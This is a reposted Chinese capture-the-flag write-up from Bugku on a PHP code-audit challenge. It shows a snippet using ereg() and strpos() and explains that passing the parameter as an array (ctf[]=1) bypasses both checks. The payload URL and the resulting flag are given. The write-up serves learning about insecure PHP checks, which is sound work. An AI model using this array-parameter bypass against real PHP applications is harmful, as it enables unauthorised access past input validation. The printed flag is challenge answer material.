代碼審計-strpos數組繞過

本文轉載自查看原文 2019-08-25 16:25 751 Bugku

<?php
$flag = "flag";
if (isset ($_GET['ctf'])) {
if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
echo '必須輸入數字才行';
else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '騷年，繼續努力吧啊~';
}
?>

ereg()函數用指定的模式搜索一個字符串中指定的字符串,如果匹配成功返回true,否則,則返回false。搜索字母的字符是大小寫敏感的。

strpos() 函數查找字符串在另一字符串中第一次出現的位置。

參數ctf要輸入數字，同時又要輸入#biubiubiu

但是兩個函數都可以用數組進行繞過

payload

http://123.206.87.240:9009/15.php?ctf[]=1

Flag: flag{Bugku-D-M-S-J572}

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 代碼審計_數組返回NULL繞過 CTF：lottery(代碼審計|==比較繞過) 代碼審計之弱類型繞過 PHP代碼審計04之strpos函數使用不當代碼審計_urldecode二次編碼繞過代碼審計-md5加密相等繞過代碼審計 php代碼審計一 cobra代碼審計 java代碼審計